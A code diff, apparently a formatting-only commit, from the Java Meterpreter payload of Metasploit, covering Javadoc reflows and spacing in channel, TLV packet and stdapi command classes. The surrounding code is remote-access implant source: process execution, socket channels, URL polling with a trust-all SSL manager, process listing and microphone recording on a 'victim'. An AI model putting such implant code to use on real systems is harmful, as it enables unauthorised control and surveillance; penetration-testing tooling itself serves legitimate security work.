public Channel(Meterpreter meterpreter, InputStream in, OutputStream out) {
this.meterpreter = meterpreter;
@ -51,7 +48,7 @@ public class Channel {
/**
* Check whether this channel is at end of file.
*
* <p/>
* Note that even if this returns false, a subsequent read might return <code>null</code> for EOF, when the channel's state switches from "no data available" to EOF between the two calls.
*/
public synchronized boolean isEOF() throws IOException {
@ -66,8 +63,7 @@ public class Channel {
/**
* Read at least one byte, and up to maxLength bytes from this stream.
*
* @param maxLength
* The maximum number of bytes to read.
* @param maxLength The maximum number of bytes to read.
* @return The bytes read, or <code>null</code> if the end of the stream has been reached.
*/
public synchronized byte[] read(int maxLength) throws IOException, InterruptedException {
@ -91,10 +87,8 @@ public class Channel {
/**
* Write length bytes from the start of data to this channel.
*
* @param data
* The data to write
* @param length
* The length to write
* @param data The data to write
* @param length The length to write
*/
public void write(byte[] data, int length, TLVPacket request) throws IOException {
if (out == null)
@ -130,8 +124,7 @@ public class Channel {
/**
* Called from the {@link InteractThread} to notify the meterpreter of new data available on this channel.
*
* @param data
* The new data available, or <code>null</code> if EOF has been reached.
* @param data The new data available, or <code>null</code> if EOF has been reached.
*/
protected synchronized void handleInteract(byte[] data) throws IOException, InterruptedException {
while (waiting) {

27
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/CommandManager.java

@ -52,10 +52,8 @@ public class CommandManager {
/**
* Register a command that can be executed on all Java versions (from 1.2 onward)
*
* @param command
* Name of the command
* @param commandClass
* Class that implements the command
* @param command Name of the command
* @param commandClass Class that implements the command
*/
public void registerCommand(String command, Class commandClass) throws Exception {
registerCommand(command, commandClass, ExtensionLoader.V1_2);
@ -64,12 +62,9 @@ public class CommandManager {
/**
* Register a command that can be executed only on some Java versions
*
* @param command
* Name of the command
* @param commandClass
* Stub class for generating the class name that implements the command
* @param version
* Minimum Java version
* @param command Name of the command
* @param commandClass Stub class for generating the class name that implements the command
* @param version Minimum Java version
*/
public void registerCommand(String command, Class commandClass, int version) throws Exception {
registerCommand(command, commandClass, version, version);
@ -78,14 +73,10 @@ public class CommandManager {
/**
* Register a command that can be executed only on some Java versions, and has two different implementations for different Java versions.
*
* @param command
* Name of the command
* @param commandClass
* Stub class for generating the class name that implements the command
* @param version
* Minimum Java version
* @param secondVersion
* Minimum Java version for the second implementation
* @param command Name of the command
* @param commandClass Stub class for generating the class name that implements the command
* @param version Minimum Java version
* @param secondVersion Minimum Java version for the second implementation
*/
public void registerCommand(String command, Class commandClass, int version, int secondVersion) throws Exception {
if (secondVersion < version)

3
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/ExtensionLoader.java

@ -16,8 +16,7 @@ public interface ExtensionLoader {
/**
* Load this extension.
*
* @param commandManager
* command manager to load commands into.
* @param commandManager command manager to load commands into.
*/
public void load(CommandManager commandManager) throws Exception;
}

64
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java

@ -44,14 +44,10 @@ public class Meterpreter {
/**
* Initialize the meterpreter.
*
* @param in
* Input stream to read from
* @param rawOut
* Output stream to write into
* @param loadExtensions
* Whether to load (as a {@link ClassLoader} would do) the extension jars; disable this if you want to use your debugger's edit-and-continue feature or if you do not want to update the jars after each build
* @param redirectErrors
* Whether to redirect errors to the internal error buffer; disable this to see the errors on the victim's standard error stream
* @param in Input stream to read from
* @param rawOut Output stream to write into
* @param loadExtensions Whether to load (as a {@link ClassLoader} would do) the extension jars; disable this if you want to use your debugger's edit-and-continue feature or if you do not want to update the jars after each build
* @param redirectErrors Whether to redirect errors to the internal error buffer; disable this to see the errors on the victim's standard error stream
* @throws Exception
*/
public Meterpreter(DataInputStream in, OutputStream rawOut, boolean loadExtensions, boolean redirectErrors) throws Exception {
@ -61,16 +57,11 @@ public class Meterpreter {
/**
* Initialize the meterpreter.
*
* @param in
* Input stream to read from
* @param rawOut
* Output stream to write into
* @param loadExtensions
* Whether to load (as a {@link ClassLoader} would do) the extension jars; disable this if you want to use your debugger's edit-and-continue feature or if you do not want to update the jars after each build
* @param redirectErrors
* Whether to redirect errors to the internal error buffer; disable this to see the errors on the victim's standard error stream
* @param beginExecution
* Whether to begin executing immediately
* @param in Input stream to read from
* @param rawOut Output stream to write into
* @param loadExtensions Whether to load (as a {@link ClassLoader} would do) the extension jars; disable this if you want to use your debugger's edit-and-continue feature or if you do not want to update the jars after each build
* @param redirectErrors Whether to redirect errors to the internal error buffer; disable this to see the errors on the victim's standard error stream
* @param beginExecution Whether to begin executing immediately
* @throws Exception
*/
public Meterpreter(DataInputStream in, OutputStream rawOut, boolean loadExtensions, boolean redirectErrors, boolean beginExecution) throws Exception {
@ -107,7 +98,7 @@ public class Meterpreter {
}
out.close();
synchronized (this) {
for (Iterator it = channels.iterator(); it.hasNext();) {
for (Iterator it = channels.iterator(); it.hasNext(); ) {
Channel c = (Channel) it.next();
if (c != null)
c.close();
@ -118,10 +109,8 @@ public class Meterpreter {
/**
* Write a TLV packet to this meterpreter's output stream.
*
* @param type
* The type ({@link #PACKET_TYPE_REQUEST} or {@link #PACKET_TYPE_RESPONSE})
* @param packet
* The packet to send
* @param type The type ({@link #PACKET_TYPE_REQUEST} or {@link #PACKET_TYPE_RESPONSE})
* @param packet The packet to send
*/
private synchronized void writeTLV(int type, TLVPacket packet) throws IOException {
byte[] data = packet.toByteArray();
@ -145,8 +134,7 @@ public class Meterpreter {
/**
* Execute a command request.
*
* @param request
* The request to execute
* @param request The request to execute
* @return The response packet to send back
*/
private TLVPacket executeCommand(TLVPacket request) throws IOException {
@ -177,6 +165,7 @@ public class Meterpreter {
/**
* Poll from a given URL until a shutdown request is received.
*
* @param url
*/
private void pollURL(URL url, int sessionExpirationTimeout, int sessionCommunicationTimeout) throws IOException {
@ -199,7 +188,7 @@ public class Meterpreter {
// load the trust manager via reflection, to avoid loading
// it when it is not needed (it requires Sun Java 1.4+)
try {
Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[] {URLConnection.class}).invoke(null, new Object[] {uc});
Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
} catch (Exception ex) {
ex.printStackTrace(getErrorStream());
}
@ -260,8 +249,7 @@ public class Meterpreter {
/**
* Register a new channel in this meterpreter. Used only by {@link Channel#Channel(Meterpreter, java.io.InputStream, OutputStream, java.io.InputStream)}.
*
* @param channel
* The channel to register
* @param channel The channel to register
* @return The channel's ID.
*/
public synchronized int registerChannel(Channel channel) {
@ -272,8 +260,7 @@ public class Meterpreter {
/**
* Used by {@link Channel#close()} to notify the meterpreter that the channel has been closed.
*
* @param id
* The channel's ID
* @param id The channel's ID
*/
public synchronized void channelClosed(int id) {
channels.set(id, null);
@ -282,10 +269,8 @@ public class Meterpreter {
/**
* Obtain a channel for a given channel ID
*
* @param id
* The channel ID to look up
* @param throwIfNonexisting
* Whether to throw an exception if the channel does not exist
* @param id The channel ID to look up
* @param throwIfNonexisting Whether to throw an exception if the channel does not exist
* @return The channel, or <code>null</code> if the channel does not exist and it should not throw an exception
*/
public Channel getChannel(int id, boolean throwIfNonexisting) {
@ -329,10 +314,8 @@ public class Meterpreter {
/**
* Send a request packet over this meterpreter.
*
* @param packet
* Packet parameters
* @param method
* Method to invoke
* @param packet Packet parameters
* @param method Method to invoke
*/
public void writeRequestPacket(String method, TLVPacket tlv) throws IOException {
tlv.add(TLVType.TLV_TYPE_METHOD, method);
@ -347,14 +330,13 @@ public class Meterpreter {
/**
* Load an extension into this meterpreter. Called from {@link core_loadlib}.
*
* @param data
* The extension jar's content as a byte array
* @param data The extension jar's content as a byte array
*/
public String[] loadExtension(byte[] data) throws Exception {
ClassLoader classLoader = getClass().getClassLoader();
if (loadExtensions) {
URL url = MemoryBufferURLConnection.createURL(data, "application/jar");
classLoader = new URLClassLoader(new URL[] { url }, classLoader);
classLoader = new URLClassLoader(new URL[]{url}, classLoader);
}
JarInputStream jis = new JarInputStream(new ByteArrayInputStream(data));
String loaderName = (String) jis.getManifest().getMainAttributes().getValue("Extension-Loader");

5
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/PayloadTrustManager.java

@ -9,6 +9,7 @@ import javax.net.ssl.SSLSession;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import java.security.cert.X509Certificate;
/**
@ -16,7 +17,7 @@ import java.security.cert.X509Certificate;
* depends on classes only present on Sun JRE 1.4+, and incorporating it into
* the main {@link Meterpreter} class would have made it impossible for other/older
* JREs to load it.
*
* <p/>
* This class is substantically identical to the metasploit.PayloadTrustManager class,
* only that it tries to cache the ssl context and trust manager between calls.
*/
@ -53,7 +54,7 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
if (instance == null) {
instance = new PayloadTrustManager();
SSLContext sc = SSLContext.getInstance("SSL");
sc.init(null, new TrustManager[] { instance }, new java.security.SecureRandom());
sc.init(null, new TrustManager[]{instance}, new java.security.SecureRandom());
factory = sc.getSocketFactory();
}
huc.setSSLSocketFactory(factory);

27
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVPacket.java

@ -63,12 +63,9 @@ public class TLVPacket {
/**
* Read a TLV packet from an input stream.
*
* @param in
* Input stream to read from
* @param remaining
* length of the packet to read in bytes
* @throws IOException
* if an error occurs
* @param in Input stream to read from
* @param remaining length of the packet to read in bytes
* @throws IOException if an error occurs
*/
public TLVPacket(DataInputStream in, int remaining) throws IOException {
while (remaining > 0) {
@ -127,7 +124,7 @@ public class TLVPacket {
typeOrder.add(typeObj);
if (valueMap.containsKey(typeObj)) {
indices = (ArrayList)valueMap.get(typeObj);
indices = (ArrayList) valueMap.get(typeObj);
} else {
indices = new ArrayList();
valueMap.put(typeObj, indices);
@ -180,12 +177,12 @@ public class TLVPacket {
* Get the value associated to a type.
*/
public Object getValue(int type) {
ArrayList indices = (ArrayList)valueMap.get(new Integer(type));
ArrayList indices = (ArrayList) valueMap.get(new Integer(type));
if (indices == null)
throw new IllegalArgumentException("Cannot find type " + type);
// the indices variable is an ArrayList so by default return the first to
// preserve existing behaviour.
return valueList.get(((Integer)indices.get(0)).intValue());
return valueList.get(((Integer) indices.get(0)).intValue());
}
/**
@ -193,12 +190,12 @@ public class TLVPacket {
*/
public List getValues(int type) {
ArrayList values = new ArrayList();
ArrayList indices = (ArrayList)valueMap.get(new Integer(type));
ArrayList indices = (ArrayList) valueMap.get(new Integer(type));
if (indices == null)
throw new IllegalArgumentException("Cannot find type " + type);
for (int i = 0; i < indices.size(); ++i) {
values.add(valueList.get(((Integer)indices.get(i)).intValue()));
values.add(valueList.get(((Integer) indices.get(i)).intValue()));
}
return values;
}
@ -207,12 +204,12 @@ public class TLVPacket {
* Get the value associated to a type.
*/
public Object getValue(int type, Object defaultValue) {
ArrayList indices = (ArrayList)valueMap.get(new Integer(type));
ArrayList indices = (ArrayList) valueMap.get(new Integer(type));
if (indices == null)
return defaultValue;
// the indices variable is an ArrayList so by default return the first to
// preserve existing behaviour.
return valueList.get(((Integer)indices.get(0)).intValue());
return valueList.get(((Integer) indices.get(0)).intValue());
}
/**
@ -261,13 +258,13 @@ public class TLVPacket {
* Write all the values to an output stream.
*/
public void write(DataOutputStream out) throws IOException {
for (Iterator it = typeOrder.iterator(); it.hasNext();) {
for (Iterator it = typeOrder.iterator(); it.hasNext(); ) {
Integer typeKey = (Integer) it.next();
int type = typeKey.intValue();
Object value = getValue(type);
write(out, type, value);
}
for (Iterator it = overflowList.iterator(); it.hasNext();) {
for (Iterator it = overflowList.iterator(); it.hasNext(); ) {
Integer typeKey = (Integer) it.next();
int type = typeKey.intValue();
Object value = it.next();

2
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java

@ -2,7 +2,7 @@ package com.metasploit.meterpreter;
/**
* All defined TLV types.
*
* <p/>
* TLV meta types are defined in the {@link TLVPacket} class.
*
* @author mihi

12
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/command/Command.java

@ -24,15 +24,11 @@ public interface Command {
/**
* Execute this command.
*
* @param request
* request packet
* @param response
* response packet
* @param errorStream
* Stream to write errors to
* @param request request packet
* @param response response packet
* @param errorStream Stream to write errors to
* @return a status code (usually {@link #ERROR_SUCCESS} or {@link ERROR_FAILURE})
* @throws any
* exception, which will be mapped to an error stream output and an {@link ERROR_FAILURE} status code.
* @throws any exception, which will be mapped to an error stream output and an {@link ERROR_FAILURE} status code.
*/
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception;
}

2
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/command/NotYetImplementedCommand.java

@ -156,7 +156,7 @@ public class NotYetImplementedCommand implements Command {
}
private void dumpTLV(PrintStream errorStream, TLVPacket request) {
for (Iterator it = request.getTypeOrder().iterator(); it.hasNext();) {
for (Iterator it = request.getTypeOrder().iterator(); it.hasNext(); ) {
int type = ((Integer) it.next()).intValue();
int restType = type;
String typePrefix = "";

6
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/command/UnsupportedJavaVersionCommand.java

@ -17,10 +17,8 @@ public class UnsupportedJavaVersionCommand implements Command {
/**
* Create a new instance of that command.
*
* @param command
* Name of the command
* @param version
* Version required
* @param command Name of the command
* @param version Version required
*/
public UnsupportedJavaVersionCommand(String command, int version) {
this.command = command;

6
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/DatagramSocketChannel.java

@ -20,10 +20,8 @@ public class DatagramSocketChannel extends Channel {
/**
* Create a new socket channel.
*
* @param meterpreter
* The meterpreter this channel should be assigned to.
* @param socket
* Socket of the channel
* @param meterpreter The meterpreter this channel should be assigned to.
* @param socket Socket of the channel
*/
public DatagramSocketChannel(Meterpreter meterpreter, DatagramSocket datagramSocket) throws IOException {
super(meterpreter, new ByteArrayInputStream(new byte[0]), null);

6
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/ProcessChannel.java

@ -19,10 +19,8 @@ public class ProcessChannel extends Channel {
/**
* Create a new process channel.
*
* @param meterpreter
* The meterpreter this channel should be assigned to.
* @param process
* Process of the channel
* @param meterpreter The meterpreter this channel should be assigned to.
* @param process Process of the channel
*/
public ProcessChannel(Meterpreter meterpreter, Process process) {
super(meterpreter, process.getInputStream(), process.getOutputStream());

8
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/ServerSocketChannel.java

@ -19,10 +19,8 @@ public class ServerSocketChannel extends Channel {
/**
* Create a new socket channel.
*
* @param meterpreter
* The meterpreter this channel should be assigned to.
* @param socket
* Socket of the channel
* @param meterpreter The meterpreter this channel should be assigned to.
* @param socket Socket of the channel
*/
public ServerSocketChannel(Meterpreter meterpreter, ServerSocket serverSocket) throws IOException {
super(meterpreter, new ByteArrayInputStream(new byte[0]), null);
@ -43,7 +41,7 @@ public class ServerSocketChannel extends Channel {
private class AcceptThread extends Thread {
public void run() {
try {
while(true) {
while (true) {
Socket s = serverSocket.accept();
SocketChannel ch = new SocketChannel(getMeterpreter(), s);

6
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/SocketChannel.java

@ -15,10 +15,8 @@ public class SocketChannel extends Channel {
/**
* Create a new socket channel.
*
* @param meterpreter
* The meterpreter this channel should be assigned to.
* @param socket
* Socket of the channel
* @param meterpreter The meterpreter this channel should be assigned to.
* @param socket Socket of the channel
*/
public SocketChannel(Meterpreter meterpreter, Socket socket) throws IOException {
super(meterpreter, socket.getInputStream(), socket.getOutputStream());

2
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/channel_create_stdapi_net_udp_client.java

@ -23,7 +23,7 @@ public class channel_create_stdapi_net_udp_client implements Command {
if (peerPort != 0) {
ds.connect(InetAddress.getByName(peerHost), peerPort);
}
Channel channel = new DatagramSocketChannel(meterpreter,ds);
Channel channel = new DatagramSocketChannel(meterpreter, ds);
response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
return ERROR_SUCCESS;
}

3
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_fs_stat.java

@ -41,8 +41,7 @@ public class stdapi_fs_stat implements Command {
// Work around it by always treating / as unhidden.
| (!file.getAbsolutePath().equals("/") && file.isHidden() ? 1 : 0)
| (file.isDirectory() ? 040000 : 0)
| (file.isFile() ? 0100000 : 0)
;
| (file.isFile() ? 0100000 : 0);
return stat(mode, file.length(), file.lastModified());
}

4
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_net_config_get_interfaces_V1_4.java

@ -16,7 +16,7 @@ public class stdapi_net_config_get_interfaces_V1_4 extends stdapi_net_config_get
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
int index = 0;
for (Enumeration ifaces = NetworkInterface.getNetworkInterfaces(); ifaces.hasMoreElements();) {
for (Enumeration ifaces = NetworkInterface.getNetworkInterfaces(); ifaces.hasMoreElements(); ) {
NetworkInterface iface = (NetworkInterface) ifaces.nextElement();
TLVPacket ifaceTLV = new TLVPacket();
ifaceTLV.add(TLVType.TLV_TYPE_INTERFACE_INDEX, ++index);
@ -60,7 +60,7 @@ public class stdapi_net_config_get_interfaces_V1_4 extends stdapi_net_config_get
*/
public Address[] getAddresses(NetworkInterface iface) throws IOException {
List/* <Address> */result = new ArrayList();
for (Enumeration en = iface.getInetAddresses(); en.hasMoreElements();) {
for (Enumeration en = iface.getInetAddresses(); en.hasMoreElements(); ) {
InetAddress addr = (InetAddress) en.nextElement();
byte[] ip = addr.getAddress();
if (ip == null)

2
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_net_config_get_interfaces_V1_6.java

@ -18,7 +18,7 @@ public class stdapi_net_config_get_interfaces_V1_6 extends stdapi_net_config_get
public Address[] getAddresses(NetworkInterface iface) throws IOException {
List/* <Address> */result = new ArrayList();
List addresses = iface.getInterfaceAddresses();
for (Iterator it = addresses.iterator(); it.hasNext();) {
for (Iterator it = addresses.iterator(); it.hasNext(); ) {
InterfaceAddress addr = (InterfaceAddress) it.next();
byte[] ip = addr.getAddress().getAddress();
if (ip == null)

2
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_net_config_get_routes_V1_4.java

@ -12,7 +12,7 @@ public class stdapi_net_config_get_routes_V1_4 extends stdapi_net_config_get_rou
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
stdapi_net_config_get_interfaces_V1_4 getIfaceCommand = (stdapi_net_config_get_interfaces_V1_4) meterpreter.getCommandManager().getCommand("stdapi_net_config_get_interfaces");
for (Enumeration ifaces = NetworkInterface.getNetworkInterfaces(); ifaces.hasMoreElements();) {
for (Enumeration ifaces = NetworkInterface.getNetworkInterfaces(); ifaces.hasMoreElements(); ) {
NetworkInterface iface = (NetworkInterface) ifaces.nextElement();
stdapi_net_config_get_interfaces_V1_4.Address[] addresses = getIfaceCommand.getAddresses(iface);
for (int i = 0; i < addresses.length; i++) {

3
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_config_getenv.java

@ -4,6 +4,7 @@ import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
import java.util.List;
public class stdapi_sys_config_getenv implements Command {
@ -11,7 +12,7 @@ public class stdapi_sys_config_getenv implements Command {
List envVars = request.getValues(TLVType.TLV_TYPE_ENV_VARIABLE);
for (int i = 0; i < envVars.size(); ++i) {
String envVar = (String)envVars.get(i);
String envVar = (String) envVars.get(i);
if (envVar.startsWith("$") || envVar.startsWith("%")) {
envVar = envVar.substring(1);

2
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_execute.java

@ -36,7 +36,7 @@ public class stdapi_sys_process_execute implements Command {
synchronized (stdapi_sys_process_execute.class) {
pid++;
response.add(TLVType.TLV_TYPE_PID, pid);
response.add(TLVType.TLV_TYPE_PROCESS_HANDLE, (long)pid);
response.add(TLVType.TLV_TYPE_PROCESS_HANDLE, (long) pid);
}
response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
} else {

8
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_get_processes.java

@ -13,7 +13,7 @@ import com.metasploit.meterpreter.command.Command;
/**
* Ported from PHP meterpreter.
*
* <p/>
* # Works, but not very portable. There doesn't appear to be a PHP way of
* # getting a list of processes, so we just shell out to ps/tasklist.exe. I need
* # to decide what options to send to ps for portability and for information
@ -24,7 +24,7 @@ public class stdapi_sys_process_get_processes implements Command {
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
List processes = new ArrayList();
if (File.pathSeparatorChar == ';') {
Process proc = Runtime.getRuntime().exec(new String[] { "tasklist.exe", "/v", "/fo", "csv", "/nh" });
Process proc = Runtime.getRuntime().exec(new String[]{"tasklist.exe", "/v", "/fo", "csv", "/nh"});
BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String line;
while ((line = br.readLine()) != null) {
@ -41,12 +41,12 @@ public class stdapi_sys_process_get_processes implements Command {
parts.add(line);
while (parts.size() < 7)
parts.add("");
processes.add(new String[] { (String) parts.get(1), (String) parts.get(6), (String) parts.get(0) });
processes.add(new String[]{(String) parts.get(1), (String) parts.get(6), (String) parts.get(0)});
}
br.close();
proc.waitFor();
} else {
Process proc = Runtime.getRuntime().exec(new String[] { "/bin/sh", "-c", "ps ax -w -o pid=,user=,command= 2>/dev/null" });
Process proc = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "ps ax -w -o pid=,user=,command= 2>/dev/null"});
BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String line;
while ((line = br.readLine()) != null) {

2
java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/webcam_audio_record_V1_4.java

@ -41,7 +41,7 @@ public class webcam_audio_record_V1_4 extends webcam_audio_record implements Com
line.open(af);
line.start();
ByteArrayOutputStream baos = new ByteArrayOutputStream();
byte[] buf = new byte[(int)af.getSampleRate() * af.getFrameSize()];
byte[] buf = new byte[(int) af.getSampleRate() * af.getFrameSize()];
long end = System.currentTimeMillis() + 1000 * duration;
int len;
while (System.currentTimeMillis() < end && ((len = line.read(buf, 0, buf.length)) != -1)) {